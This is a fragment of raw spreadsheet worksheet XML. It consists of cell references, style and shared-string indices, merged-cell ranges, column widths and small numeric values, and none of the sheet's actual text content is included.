      <c r="N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3"/>
      <c r="M776" s="24"/>
      <c r="N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3"/>
      <c r="M777" s="24"/>
      <c r="N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3"/>
      <c r="M778" s="24"/>
      <c r="N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3"/>
      <c r="M779" s="24"/>
      <c r="N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3"/>
      <c r="M780" s="24"/>
      <c r="N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3"/>
      <c r="M781" s="24"/>
      <c r="N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3"/>
      <c r="M782" s="24"/>
      <c r="N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3"/>
      <c r="M783" s="24"/>
      <c r="N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3"/>
      <c r="M784" s="24"/>
      <c r="N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3"/>
      <c r="M785" s="24"/>
      <c r="N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3"/>
      <c r="M786" s="24"/>
      <c r="N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3"/>
      <c r="M787" s="24"/>
      <c r="N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3"/>
      <c r="M788" s="24"/>
      <c r="N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3"/>
      <c r="M789" s="24"/>
      <c r="N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3"/>
      <c r="M790" s="24"/>
      <c r="N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3"/>
      <c r="M791" s="24"/>
      <c r="N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3"/>
      <c r="M792" s="24"/>
      <c r="N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3"/>
      <c r="M793" s="24"/>
      <c r="N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3"/>
      <c r="M794" s="24"/>
      <c r="N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3"/>
      <c r="M795" s="24"/>
      <c r="N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3"/>
      <c r="M796" s="24"/>
      <c r="N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3"/>
      <c r="M797" s="24"/>
      <c r="N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3"/>
      <c r="M798" s="24"/>
      <c r="N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3"/>
      <c r="M799" s="24"/>
      <c r="N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3"/>
      <c r="M800" s="24"/>
      <c r="N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3"/>
      <c r="M801" s="24"/>
      <c r="N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3"/>
      <c r="M802" s="24"/>
      <c r="N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3"/>
      <c r="M803" s="24"/>
      <c r="N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3"/>
      <c r="M804" s="24"/>
      <c r="N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3"/>
      <c r="M805" s="24"/>
      <c r="N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3"/>
      <c r="M806" s="24"/>
      <c r="N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3"/>
      <c r="M807" s="24"/>
      <c r="N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3"/>
      <c r="M808" s="24"/>
      <c r="N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3"/>
      <c r="M809" s="24"/>
      <c r="N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3"/>
      <c r="M810" s="24"/>
      <c r="N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3"/>
      <c r="M811" s="24"/>
      <c r="N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3"/>
      <c r="M812" s="24"/>
      <c r="N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3"/>
      <c r="M813" s="24"/>
      <c r="N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3"/>
      <c r="M814" s="24"/>
      <c r="N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3"/>
      <c r="M815" s="24"/>
      <c r="N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3"/>
      <c r="M816" s="24"/>
      <c r="N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3"/>
      <c r="M817" s="24"/>
      <c r="N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3"/>
      <c r="M818" s="24"/>
      <c r="N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3"/>
      <c r="M819" s="24"/>
      <c r="N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3"/>
      <c r="M820" s="24"/>
      <c r="N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3"/>
      <c r="M821" s="24"/>
      <c r="N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3"/>
      <c r="M822" s="24"/>
      <c r="N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3"/>
      <c r="M823" s="24"/>
      <c r="N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3"/>
      <c r="M824" s="24"/>
      <c r="N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3"/>
      <c r="M825" s="24"/>
      <c r="N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3"/>
      <c r="M826" s="24"/>
      <c r="N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3"/>
      <c r="M827" s="24"/>
      <c r="N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3"/>
      <c r="M828" s="24"/>
      <c r="N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3"/>
      <c r="M829" s="24"/>
      <c r="N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3"/>
      <c r="M830" s="24"/>
      <c r="N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3"/>
      <c r="M831" s="24"/>
      <c r="N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3"/>
      <c r="M832" s="24"/>
      <c r="N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3"/>
      <c r="M833" s="24"/>
      <c r="N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3"/>
      <c r="M834" s="24"/>
      <c r="N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3"/>
      <c r="M835" s="24"/>
      <c r="N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3"/>
      <c r="M836" s="24"/>
      <c r="N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3"/>
      <c r="M837" s="24"/>
      <c r="N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3"/>
      <c r="M838" s="24"/>
      <c r="N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3"/>
      <c r="M839" s="24"/>
      <c r="N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3"/>
      <c r="M840" s="24"/>
      <c r="N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3"/>
      <c r="M841" s="24"/>
      <c r="N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3"/>
      <c r="M842" s="24"/>
      <c r="N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3"/>
      <c r="M843" s="24"/>
      <c r="N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3"/>
      <c r="M844" s="24"/>
      <c r="N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3"/>
      <c r="M845" s="24"/>
      <c r="N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3"/>
      <c r="M846" s="24"/>
      <c r="N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3"/>
      <c r="M847" s="24"/>
      <c r="N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3"/>
      <c r="M848" s="24"/>
      <c r="N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3"/>
      <c r="M849" s="24"/>
      <c r="N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3"/>
      <c r="M850" s="24"/>
      <c r="N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3"/>
      <c r="M851" s="24"/>
      <c r="N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3"/>
      <c r="M852" s="24"/>
      <c r="N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3"/>
      <c r="M853" s="24"/>
      <c r="N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3"/>
      <c r="M854" s="24"/>
      <c r="N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3"/>
      <c r="M855" s="24"/>
      <c r="N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3"/>
      <c r="M856" s="24"/>
      <c r="N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3"/>
      <c r="M857" s="24"/>
      <c r="N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3"/>
      <c r="M858" s="24"/>
      <c r="N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3"/>
      <c r="M859" s="24"/>
      <c r="N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3"/>
      <c r="M860" s="24"/>
      <c r="N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3"/>
      <c r="M861" s="24"/>
      <c r="N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3"/>
      <c r="M862" s="24"/>
      <c r="N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3"/>
      <c r="M863" s="24"/>
      <c r="N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3"/>
      <c r="M864" s="24"/>
      <c r="N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3"/>
      <c r="M865" s="24"/>
      <c r="N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3"/>
      <c r="M866" s="24"/>
      <c r="N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3"/>
      <c r="M867" s="24"/>
      <c r="N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3"/>
      <c r="M868" s="24"/>
      <c r="N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3"/>
      <c r="M869" s="24"/>
      <c r="N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3"/>
      <c r="M870" s="24"/>
      <c r="N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3"/>
      <c r="M871" s="24"/>
      <c r="N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3"/>
      <c r="M872" s="24"/>
      <c r="N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3"/>
      <c r="M873" s="24"/>
      <c r="N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3"/>
      <c r="M874" s="24"/>
      <c r="N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3"/>
      <c r="M875" s="24"/>
      <c r="N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3"/>
      <c r="M876" s="24"/>
      <c r="N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3"/>
      <c r="M877" s="24"/>
      <c r="N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3"/>
      <c r="M878" s="24"/>
      <c r="N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3"/>
      <c r="M879" s="24"/>
      <c r="N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3"/>
      <c r="M880" s="24"/>
      <c r="N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3"/>
      <c r="M881" s="24"/>
      <c r="N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3"/>
      <c r="M882" s="24"/>
      <c r="N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3"/>
      <c r="M883" s="24"/>
      <c r="N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3"/>
      <c r="M884" s="24"/>
      <c r="N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3"/>
      <c r="M885" s="24"/>
      <c r="N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3"/>
      <c r="M886" s="24"/>
      <c r="N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3"/>
      <c r="M887" s="24"/>
      <c r="N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3"/>
      <c r="M888" s="24"/>
      <c r="N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3"/>
      <c r="M889" s="24"/>
      <c r="N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3"/>
      <c r="M890" s="24"/>
      <c r="N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3"/>
      <c r="M891" s="24"/>
      <c r="N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3"/>
      <c r="M892" s="24"/>
      <c r="N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3"/>
      <c r="M893" s="24"/>
      <c r="N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3"/>
      <c r="M894" s="24"/>
      <c r="N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3"/>
      <c r="M895" s="24"/>
      <c r="N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3"/>
      <c r="M896" s="24"/>
      <c r="N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3"/>
      <c r="M897" s="24"/>
      <c r="N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3"/>
      <c r="M898" s="24"/>
      <c r="N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3"/>
      <c r="M899" s="24"/>
      <c r="N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3"/>
      <c r="M900" s="24"/>
      <c r="N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3"/>
      <c r="M901" s="24"/>
      <c r="N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3"/>
      <c r="M902" s="24"/>
      <c r="N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3"/>
      <c r="M903" s="24"/>
      <c r="N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3"/>
      <c r="M904" s="24"/>
      <c r="N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3"/>
      <c r="M905" s="24"/>
      <c r="N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3"/>
      <c r="M906" s="24"/>
      <c r="N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3"/>
      <c r="M907" s="24"/>
      <c r="N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3"/>
      <c r="M908" s="24"/>
      <c r="N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3"/>
      <c r="M909" s="24"/>
      <c r="N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3"/>
      <c r="M910" s="24"/>
      <c r="N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3"/>
      <c r="M911" s="24"/>
      <c r="N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3"/>
      <c r="M912" s="24"/>
      <c r="N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3"/>
      <c r="M913" s="24"/>
      <c r="N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3"/>
      <c r="M914" s="24"/>
      <c r="N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3"/>
      <c r="M915" s="24"/>
      <c r="N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3"/>
      <c r="M916" s="24"/>
      <c r="N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3"/>
      <c r="M917" s="24"/>
      <c r="N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3"/>
      <c r="M918" s="24"/>
      <c r="N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3"/>
      <c r="M919" s="24"/>
      <c r="N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3"/>
      <c r="M920" s="24"/>
      <c r="N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3"/>
      <c r="M921" s="24"/>
      <c r="N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3"/>
      <c r="M922" s="24"/>
      <c r="N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3"/>
      <c r="M923" s="24"/>
      <c r="N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3"/>
      <c r="M924" s="24"/>
      <c r="N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3"/>
      <c r="M925" s="24"/>
      <c r="N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3"/>
      <c r="M926" s="24"/>
      <c r="N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3"/>
      <c r="M927" s="24"/>
      <c r="N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3"/>
      <c r="M928" s="24"/>
      <c r="N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3"/>
      <c r="M929" s="24"/>
      <c r="N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3"/>
      <c r="M930" s="24"/>
      <c r="N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3"/>
      <c r="M931" s="24"/>
      <c r="N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3"/>
      <c r="M932" s="24"/>
      <c r="N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3"/>
      <c r="M933" s="24"/>
      <c r="N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3"/>
      <c r="M934" s="24"/>
      <c r="N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3"/>
      <c r="M935" s="24"/>
      <c r="N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3"/>
      <c r="M936" s="24"/>
      <c r="N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3"/>
      <c r="M937" s="24"/>
      <c r="N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3"/>
      <c r="M938" s="24"/>
      <c r="N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3"/>
      <c r="M939" s="24"/>
      <c r="N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3"/>
      <c r="M940" s="24"/>
      <c r="N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3"/>
      <c r="M941" s="24"/>
      <c r="N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3"/>
      <c r="M942" s="24"/>
      <c r="N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3"/>
      <c r="M943" s="24"/>
      <c r="N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3"/>
      <c r="M944" s="24"/>
      <c r="N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3"/>
      <c r="M945" s="24"/>
      <c r="N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3"/>
      <c r="M946" s="24"/>
      <c r="N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3"/>
      <c r="M947" s="24"/>
      <c r="N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3"/>
      <c r="M948" s="24"/>
      <c r="N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3"/>
      <c r="M949" s="24"/>
      <c r="N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3"/>
      <c r="M950" s="24"/>
      <c r="N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3"/>
      <c r="M951" s="24"/>
      <c r="N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3"/>
      <c r="M952" s="24"/>
      <c r="N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3"/>
      <c r="M953" s="24"/>
      <c r="N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3"/>
      <c r="M954" s="24"/>
      <c r="N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3"/>
      <c r="M955" s="24"/>
      <c r="N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3"/>
      <c r="M956" s="24"/>
      <c r="N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3"/>
      <c r="M957" s="24"/>
      <c r="N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3"/>
      <c r="M958" s="24"/>
      <c r="N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3"/>
      <c r="M959" s="24"/>
      <c r="N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3"/>
      <c r="M960" s="24"/>
      <c r="N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3"/>
      <c r="M961" s="24"/>
      <c r="N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3"/>
      <c r="M962" s="24"/>
      <c r="N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3"/>
      <c r="M963" s="24"/>
      <c r="N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3"/>
      <c r="M964" s="24"/>
      <c r="N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3"/>
      <c r="M965" s="24"/>
      <c r="N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3"/>
      <c r="M966" s="24"/>
      <c r="N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3"/>
      <c r="M967" s="24"/>
      <c r="N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3"/>
      <c r="M968" s="24"/>
      <c r="N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3"/>
      <c r="M969" s="24"/>
      <c r="N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3"/>
      <c r="M970" s="24"/>
      <c r="N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3"/>
      <c r="M971" s="24"/>
      <c r="N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3"/>
      <c r="M972" s="24"/>
      <c r="N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3"/>
      <c r="M973" s="24"/>
      <c r="N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3"/>
      <c r="M974" s="24"/>
      <c r="N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3"/>
      <c r="M975" s="24"/>
      <c r="N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3"/>
      <c r="M976" s="24"/>
      <c r="N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3"/>
      <c r="M977" s="24"/>
      <c r="N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3"/>
      <c r="M978" s="24"/>
      <c r="N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3"/>
      <c r="M979" s="24"/>
      <c r="N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3"/>
      <c r="M980" s="24"/>
      <c r="N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3"/>
      <c r="M981" s="24"/>
      <c r="N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3"/>
      <c r="M982" s="24"/>
      <c r="N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3"/>
      <c r="M983" s="24"/>
      <c r="N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3"/>
      <c r="M984" s="24"/>
      <c r="N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3"/>
      <c r="M985" s="24"/>
      <c r="N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3"/>
      <c r="M986" s="24"/>
      <c r="N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3"/>
      <c r="M987" s="24"/>
      <c r="N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3"/>
      <c r="M988" s="24"/>
      <c r="N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3"/>
      <c r="M989" s="24"/>
      <c r="N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3"/>
      <c r="M990" s="24"/>
      <c r="N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3"/>
      <c r="M991" s="24"/>
      <c r="N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3"/>
      <c r="M992" s="24"/>
      <c r="N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3"/>
      <c r="M993" s="24"/>
      <c r="N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3"/>
      <c r="M994" s="24"/>
      <c r="N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3"/>
      <c r="M995" s="24"/>
      <c r="N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3"/>
      <c r="M996" s="24"/>
      <c r="N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3"/>
      <c r="M997" s="24"/>
      <c r="N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3"/>
      <c r="M998" s="24"/>
      <c r="N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3"/>
      <c r="M999" s="24"/>
      <c r="N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3"/>
      <c r="M1000" s="24"/>
      <c r="N1000" s="22"/>
    </row>
  </sheetData>
  <mergeCells count="21">
    <mergeCell ref="C8:C10"/>
    <mergeCell ref="D8:D10"/>
    <mergeCell ref="B2:B4"/>
    <mergeCell ref="C2:C4"/>
    <mergeCell ref="D2:D4"/>
    <mergeCell ref="B5:B7"/>
    <mergeCell ref="C5:C7"/>
    <mergeCell ref="D5:D7"/>
    <mergeCell ref="B8:B10"/>
    <mergeCell ref="C17:C19"/>
    <mergeCell ref="D17:D19"/>
    <mergeCell ref="B20:B22"/>
    <mergeCell ref="C20:C22"/>
    <mergeCell ref="D20:D22"/>
    <mergeCell ref="B11:B13"/>
    <mergeCell ref="C11:C13"/>
    <mergeCell ref="D11:D13"/>
    <mergeCell ref="B14:B16"/>
    <mergeCell ref="C14:C16"/>
    <mergeCell ref="D14:D16"/>
    <mergeCell ref="B17:B1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25"/>
    <col customWidth="1" hidden="1" min="2" max="2" width="7.25"/>
    <col customWidth="1" min="3" max="3" width="6.75"/>
    <col customWidth="1" min="4" max="4" width="16.0"/>
    <col customWidth="1" min="5" max="5" width="10.0"/>
    <col customWidth="1" min="6" max="7" width="23.13"/>
    <col customWidth="1" hidden="1" min="12" max="12" width="36.88"/>
    <col customWidth="1" min="13" max="13" width="84.88"/>
    <col customWidth="1" min="14" max="14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3">
        <v>1.0</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D2" s="3" t="s">
        <v>15</v>
      </c>
      <c r="E2" s="2">
        <v>1.0</v>
      </c>
      <c r="F2" s="4" t="s">
        <v>16</v>
      </c>
      <c r="G2" s="4" t="s">
        <v>17</v>
      </c>
      <c r="H2" s="2">
        <v>1.0</v>
      </c>
      <c r="I2" s="2">
        <v>0.0</v>
      </c>
      <c r="J2" s="2">
        <v>0.0</v>
      </c>
      <c r="K2" s="2">
        <v>0.0</v>
      </c>
      <c r="L2" s="2"/>
      <c r="M2" s="2" t="s">
        <v>18</v>
      </c>
      <c r="N2" s="2"/>
    </row>
    <row r="3">
      <c r="A3" s="2">
        <v>2.0</v>
      </c>
      <c r="E3" s="2">
        <v>2.0</v>
      </c>
      <c r="F3" s="4" t="s">
        <v>19</v>
      </c>
      <c r="G3" s="4" t="s">
        <v>20</v>
      </c>
      <c r="H3" s="2">
        <v>1.0</v>
      </c>
      <c r="I3" s="2">
        <v>0.0</v>
      </c>
      <c r="J3" s="2">
        <v>1.0</v>
      </c>
      <c r="K3" s="2">
        <v>0.0</v>
      </c>
      <c r="L3" s="5"/>
      <c r="M3" s="2" t="s">
        <v>21</v>
      </c>
      <c r="N3" s="5" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="2">
        <v>3.0</v>
      </c>
      <c r="E4" s="2">
        <v>3.0</v>
      </c>
      <c r="F4" s="4" t="s">
        <v>23</v>
      </c>
      <c r="G4" s="4" t="s">
        <v>24</v>
      </c>
      <c r="H4" s="2">
        <v>1.0</v>
      </c>
      <c r="I4" s="2">
        <v>0.0</v>
      </c>
      <c r="J4" s="2">
        <v>0.0</v>
      </c>
      <c r="K4" s="2">
        <v>0.0</v>
      </c>
      <c r="L4" s="2"/>
      <c r="M4" s="2" t="s">
        <v>25</v>
      </c>
      <c r="N4" s="2"/>
    </row>
    <row r="5">
      <c r="A5" s="2">
        <v>4.0</v>
      </c>
      <c r="B5" s="3">
        <v>1.0</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D5" s="3" t="s">
        <v>26</v>
      </c>
      <c r="E5" s="2">
        <v>1.0</v>
      </c>
      <c r="F5" s="4" t="s">
        <v>27</v>
      </c>
      <c r="G5" s="4" t="s">
        <v>28</v>
      </c>
      <c r="H5" s="2">
        <v>1.0</v>
      </c>
      <c r="I5" s="2">
        <v>0.0</v>
      </c>
      <c r="J5" s="2">
        <v>0.0</v>
      </c>
      <c r="K5" s="2">
        <v>0.0</v>
      </c>
      <c r="L5" s="2" t="s">
        <v>29</v>
      </c>
      <c r="M5" s="2" t="s">
        <v>30</v>
      </c>
      <c r="N5" s="2"/>
    </row>
    <row r="6">
      <c r="A6" s="2">
        <v>5.0</v>
      </c>
      <c r="E6" s="2">
        <v>2.0</v>
      </c>
      <c r="F6" s="4" t="s">
        <v>31</v>
      </c>
      <c r="G6" s="4" t="s">
        <v>32</v>
      </c>
      <c r="H6" s="2">
        <v>1.0</v>
      </c>
      <c r="I6" s="2">
        <v>0.0</v>
      </c>
      <c r="J6" s="2">
        <v>0.0</v>
      </c>
      <c r="K6" s="2">
        <v>0.0</v>
      </c>
      <c r="L6" s="2" t="s">
        <v>29</v>
      </c>
      <c r="M6" s="2" t="s">
        <v>30</v>
      </c>
      <c r="N6" s="2"/>
    </row>
    <row r="7">
      <c r="A7" s="2">
        <v>6.0</v>
      </c>
      <c r="E7" s="2">
        <v>3.0</v>
      </c>
      <c r="F7" s="4" t="s">
        <v>33</v>
      </c>
      <c r="G7" s="4" t="s">
        <v>34</v>
      </c>
      <c r="H7" s="2">
        <v>1.0</v>
      </c>
      <c r="I7" s="2">
        <v>0.0</v>
      </c>
      <c r="J7" s="2">
        <v>0.0</v>
      </c>
      <c r="K7" s="2">
        <v>0.0</v>
      </c>
      <c r="L7" s="5" t="s">
        <v>29</v>
      </c>
      <c r="M7" s="2" t="s">
        <v>30</v>
      </c>
      <c r="N7" s="2"/>
    </row>
    <row r="8">
      <c r="A8" s="2">
        <v>7.0</v>
      </c>
      <c r="B8" s="3">
        <v>1.0</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D8" s="3" t="s">
        <v>35</v>
      </c>
      <c r="E8" s="2">
        <v>1.0</v>
      </c>
      <c r="F8" s="6" t="s">
        <v>36</v>
      </c>
      <c r="G8" s="6" t="s">
        <v>37</v>
      </c>
      <c r="H8" s="2">
        <v>1.0</v>
      </c>
      <c r="I8" s="2">
        <v>0.0</v>
      </c>
      <c r="J8" s="2">
        <v>0.0</v>
      </c>
      <c r="K8" s="2">
        <v>0.0</v>
      </c>
      <c r="L8" s="2" t="s">
        <v>29</v>
      </c>
      <c r="M8" s="2" t="s">
        <v>38</v>
      </c>
      <c r="N8" s="2"/>
    </row>
    <row r="9">
      <c r="A9" s="2">
        <v>8.0</v>
      </c>
      <c r="E9" s="2">
        <v>2.0</v>
      </c>
      <c r="F9" s="6" t="s">
        <v>39</v>
      </c>
      <c r="G9" s="6" t="s">
        <v>40</v>
      </c>
      <c r="H9" s="2">
        <v>1.0</v>
      </c>
      <c r="I9" s="2">
        <v>0.0</v>
      </c>
      <c r="J9" s="2">
        <v>0.0</v>
      </c>
      <c r="K9" s="2">
        <v>0.0</v>
      </c>
      <c r="L9" s="5" t="s">
        <v>29</v>
      </c>
      <c r="M9" s="2" t="s">
        <v>41</v>
      </c>
      <c r="N9" s="2"/>
    </row>
    <row r="10">
      <c r="A10" s="2">
        <v>9.0</v>
      </c>
      <c r="E10" s="2">
        <v>3.0</v>
      </c>
      <c r="F10" s="6" t="s">
        <v>42</v>
      </c>
      <c r="G10" s="6" t="s">
        <v>43</v>
      </c>
      <c r="H10" s="2">
        <v>1.0</v>
      </c>
      <c r="I10" s="2">
        <v>0.0</v>
      </c>
      <c r="J10" s="2">
        <v>0.0</v>
      </c>
      <c r="K10" s="2">
        <v>0.0</v>
      </c>
      <c r="L10" s="2" t="s">
        <v>29</v>
      </c>
      <c r="M10" s="2" t="s">
        <v>41</v>
      </c>
      <c r="N10" s="2"/>
    </row>
    <row r="11">
      <c r="A11" s="2">
        <v>10.0</v>
      </c>
      <c r="B11" s="3">
        <v>1.0</v>
      </c>
      <c r="C11" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D11" s="3" t="s">
        <v>44</v>
      </c>
      <c r="E11" s="2">
        <v>1.0</v>
      </c>
      <c r="F11" s="6" t="s">
        <v>45</v>
      </c>
      <c r="G11" s="6" t="s">
        <v>46</v>
      </c>
      <c r="H11" s="2">
        <v>1.0</v>
      </c>
      <c r="I11" s="2">
        <v>0.0</v>
      </c>
      <c r="J11" s="2">
        <v>0.0</v>
      </c>
      <c r="K11" s="2">
        <v>0.0</v>
      </c>
      <c r="L11" s="2" t="s">
        <v>47</v>
      </c>
      <c r="M11" s="2" t="s">
        <v>48</v>
      </c>
      <c r="N11" s="2"/>
    </row>
    <row r="12">
      <c r="A12" s="2">
        <v>11.0</v>
      </c>
      <c r="E12" s="2">
        <v>2.0</v>
      </c>
      <c r="F12" s="6" t="s">
        <v>49</v>
      </c>
      <c r="G12" s="6" t="s">
        <v>50</v>
      </c>
      <c r="H12" s="2">
        <v>1.0</v>
      </c>
      <c r="I12" s="2">
        <v>0.0</v>
      </c>
      <c r="J12" s="2">
        <v>0.0</v>
      </c>
      <c r="K12" s="2">
        <v>0.0</v>
      </c>
      <c r="L12" s="2" t="s">
        <v>51</v>
      </c>
      <c r="M12" s="2" t="s">
        <v>48</v>
      </c>
      <c r="N12" s="2"/>
    </row>
    <row r="13">
      <c r="A13" s="2">
        <v>12.0</v>
      </c>
      <c r="E13" s="2">
        <v>3.0</v>
      </c>
      <c r="F13" s="6" t="s">
        <v>52</v>
      </c>
      <c r="G13" s="6" t="s">
        <v>53</v>
      </c>
      <c r="H13" s="2">
        <v>1.0</v>
      </c>
      <c r="I13" s="2">
        <v>0.0</v>
      </c>
      <c r="J13" s="2">
        <v>0.0</v>
      </c>
      <c r="K13" s="2">
        <v>0.0</v>
      </c>
      <c r="L13" s="2" t="s">
        <v>51</v>
      </c>
      <c r="M13" s="2" t="s">
        <v>48</v>
      </c>
      <c r="N13" s="2"/>
    </row>
    <row r="14">
      <c r="A14" s="2">
        <v>13.0</v>
      </c>
      <c r="B14" s="3">
        <v>1.0</v>
      </c>
      <c r="C14" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D14" s="3" t="s">
        <v>54</v>
      </c>
      <c r="E14" s="2">
        <v>1.0</v>
      </c>
      <c r="F14" s="6" t="s">
        <v>55</v>
      </c>
      <c r="G14" s="6" t="s">
        <v>56</v>
      </c>
      <c r="H14" s="2">
        <v>1.0</v>
      </c>
      <c r="I14" s="2">
        <v>0.0</v>
      </c>
      <c r="J14" s="2">
        <v>0.0</v>
      </c>
      <c r="K14" s="2">
        <v>0.0</v>
      </c>
      <c r="L14" s="2" t="s">
        <v>57</v>
      </c>
      <c r="M14" s="2" t="s">
        <v>58</v>
      </c>
      <c r="N14" s="2"/>
    </row>
    <row r="15">
      <c r="A15" s="2">
        <v>14.0</v>
      </c>
      <c r="E15" s="2">
        <v>2.0</v>
      </c>
      <c r="F15" s="6" t="s">
        <v>59</v>
      </c>
      <c r="G15" s="6" t="s">
        <v>60</v>
      </c>
      <c r="H15" s="2">
        <v>1.0</v>
      </c>
      <c r="I15" s="2">
        <v>0.0</v>
      </c>
      <c r="J15" s="2">
        <v>0.0</v>
      </c>
      <c r="K15" s="2">
        <v>0.0</v>
      </c>
      <c r="L15" s="7" t="s">
        <v>61</v>
      </c>
      <c r="M15" s="2" t="s">
        <v>62</v>
      </c>
      <c r="N15" s="2"/>
    </row>
    <row r="16">
      <c r="A16" s="2">
        <v>15.0</v>
      </c>
      <c r="E16" s="2">
        <v>3.0</v>
      </c>
      <c r="F16" s="6" t="s">
        <v>63</v>
      </c>
      <c r="G16" s="6" t="s">
        <v>64</v>
      </c>
      <c r="H16" s="2">
        <v>1.0</v>
      </c>
      <c r="I16" s="2">
        <v>0.0</v>
      </c>
      <c r="J16" s="2">
        <v>0.0</v>
      </c>
      <c r="K16" s="2">
        <v>0.0</v>
      </c>
      <c r="L16" s="2" t="s">
        <v>65</v>
      </c>
      <c r="M16" s="2" t="s">
        <v>66</v>
      </c>
      <c r="N16" s="2"/>
    </row>
    <row r="17">
      <c r="A17" s="2">
        <v>16.0</v>
      </c>
      <c r="B17" s="3">
        <v>1.0</v>
      </c>
      <c r="C17" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D17" s="3" t="s">
        <v>67</v>
      </c>
      <c r="E17" s="2">
        <v>1.0</v>
      </c>
      <c r="F17" s="6" t="s">
        <v>68</v>
      </c>
      <c r="G17" s="6" t="s">
        <v>69</v>
      </c>
      <c r="H17" s="2">
        <v>1.0</v>
      </c>
      <c r="I17" s="2">
        <v>0.0</v>
      </c>
      <c r="J17" s="2">
        <v>0.0</v>
      </c>
      <c r="K17" s="2">
        <v>0.0</v>
      </c>
      <c r="L17" s="2" t="s">
        <v>70</v>
      </c>
      <c r="M17" s="2" t="s">
        <v>71</v>
      </c>
      <c r="N17" s="2"/>
    </row>
    <row r="18">
      <c r="A18" s="2">
        <v>17.0</v>
      </c>
      <c r="E18" s="2">
        <v>2.0</v>
      </c>
      <c r="F18" s="6" t="s">
        <v>72</v>
      </c>
      <c r="G18" s="6" t="s">
        <v>73</v>
      </c>
      <c r="H18" s="2">
        <v>1.0</v>
      </c>
      <c r="I18" s="2">
        <v>0.0</v>
      </c>
      <c r="J18" s="2">
        <v>0.0</v>
      </c>
      <c r="K18" s="2">
        <v>0.0</v>
      </c>
      <c r="L18" s="2" t="s">
        <v>74</v>
      </c>
      <c r="M18" s="2" t="s">
        <v>71</v>
      </c>
      <c r="N18" s="2"/>
    </row>
    <row r="19">
      <c r="A19" s="2">
        <v>18.0</v>
      </c>
      <c r="E19" s="2">
        <v>3.0</v>
      </c>
      <c r="F19" s="6" t="s">
        <v>75</v>
      </c>
      <c r="G19" s="6" t="s">
        <v>76</v>
      </c>
      <c r="H19" s="2">
        <v>1.0</v>
      </c>
      <c r="I19" s="2">
        <v>0.0</v>
      </c>
      <c r="J19" s="2">
        <v>0.0</v>
      </c>
      <c r="K19" s="2">
        <v>0.0</v>
      </c>
      <c r="L19" s="7" t="s">
        <v>77</v>
      </c>
      <c r="M19" s="2" t="s">
        <v>71</v>
      </c>
      <c r="N19" s="2"/>
    </row>
    <row r="20">
      <c r="A20" s="8">
        <v>19.0</v>
      </c>
      <c r="B20" s="9">
        <v>1.0</v>
      </c>
      <c r="C20" s="10" t="s">
        <v>14</v>
      </c>
      <c r="D20" s="11" t="s">
        <v>78</v>
      </c>
      <c r="E20" s="10">
        <v>1.0</v>
      </c>
      <c r="F20" s="12" t="s">
        <v>79</v>
      </c>
      <c r="G20" s="12" t="s">
        <v>80</v>
      </c>
      <c r="H20" s="2">
        <v>1.0</v>
      </c>
      <c r="I20" s="2">
        <v>0.0</v>
      </c>
      <c r="J20" s="2">
        <v>0.0</v>
      </c>
      <c r="K20" s="2">
        <v>0.0</v>
      </c>
      <c r="L20" s="13"/>
      <c r="M20" s="14" t="s">
        <v>81</v>
      </c>
      <c r="N20" s="15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</row>
    <row r="21">
      <c r="A21" s="8">
        <v>20.0</v>
      </c>
      <c r="E21" s="10">
        <v>2.0</v>
      </c>
      <c r="F21" s="12" t="s">
        <v>82</v>
      </c>
      <c r="G21" s="12" t="s">
        <v>83</v>
      </c>
      <c r="H21" s="2">
        <v>1.0</v>
      </c>
      <c r="I21" s="2">
        <v>0.0</v>
      </c>
      <c r="J21" s="2">
        <v>0.0</v>
      </c>
      <c r="K21" s="2">
        <v>0.0</v>
      </c>
      <c r="L21" s="13"/>
      <c r="M21" s="14" t="s">
        <v>84</v>
      </c>
      <c r="N21" s="15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</row>
    <row r="22">
      <c r="A22" s="8">
        <v>21.0</v>
      </c>
      <c r="E22" s="10">
        <v>3.0</v>
      </c>
      <c r="F22" s="12" t="s">
        <v>85</v>
      </c>
      <c r="G22" s="12" t="s">
        <v>86</v>
      </c>
      <c r="H22" s="2">
        <v>1.0</v>
      </c>
      <c r="I22" s="2">
        <v>0.0</v>
      </c>
      <c r="J22" s="2">
        <v>0.0</v>
      </c>
      <c r="K22" s="2">
        <v>0.0</v>
      </c>
      <c r="L22" s="13"/>
      <c r="M22" s="14" t="s">
        <v>87</v>
      </c>
      <c r="N22" s="13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</row>
    <row r="23">
      <c r="A23" s="17">
        <v>22.0</v>
      </c>
      <c r="B23" s="17">
        <v>1.0</v>
      </c>
      <c r="C23" s="17" t="s">
        <v>88</v>
      </c>
      <c r="D23" s="18" t="s">
        <v>89</v>
      </c>
      <c r="E23" s="17">
        <v>1.0</v>
      </c>
      <c r="F23" s="17" t="s">
        <v>90</v>
      </c>
      <c r="G23" s="17" t="s">
        <v>91</v>
      </c>
      <c r="H23" s="2">
        <v>0.0</v>
      </c>
      <c r="I23" s="2">
        <v>0.0</v>
      </c>
      <c r="J23" s="2">
        <v>0.0</v>
      </c>
      <c r="K23" s="2">
        <v>2.0</v>
      </c>
      <c r="L23" s="19"/>
      <c r="M23" s="20" t="s">
        <v>92</v>
      </c>
      <c r="N23" s="21"/>
    </row>
    <row r="24">
      <c r="A24" s="17">
        <v>23.0</v>
      </c>
      <c r="B24" s="17">
        <v>1.0</v>
      </c>
      <c r="C24" s="17" t="s">
        <v>88</v>
      </c>
      <c r="D24" s="18" t="s">
        <v>89</v>
      </c>
      <c r="E24" s="17">
        <v>2.0</v>
      </c>
      <c r="F24" s="17" t="s">
        <v>93</v>
      </c>
      <c r="G24" s="17" t="s">
        <v>94</v>
      </c>
      <c r="H24" s="2">
        <v>0.0</v>
      </c>
      <c r="I24" s="2">
        <v>0.0</v>
      </c>
      <c r="J24" s="2">
        <v>0.0</v>
      </c>
      <c r="K24" s="2">
        <v>2.0</v>
      </c>
      <c r="L24" s="19"/>
      <c r="M24" s="20" t="s">
        <v>95</v>
      </c>
      <c r="N24" s="21"/>
    </row>
    <row r="25">
      <c r="A25" s="17">
        <v>24.0</v>
      </c>
      <c r="B25" s="17">
        <v>1.0</v>
      </c>
      <c r="C25" s="17" t="s">
        <v>88</v>
      </c>
      <c r="D25" s="18" t="s">
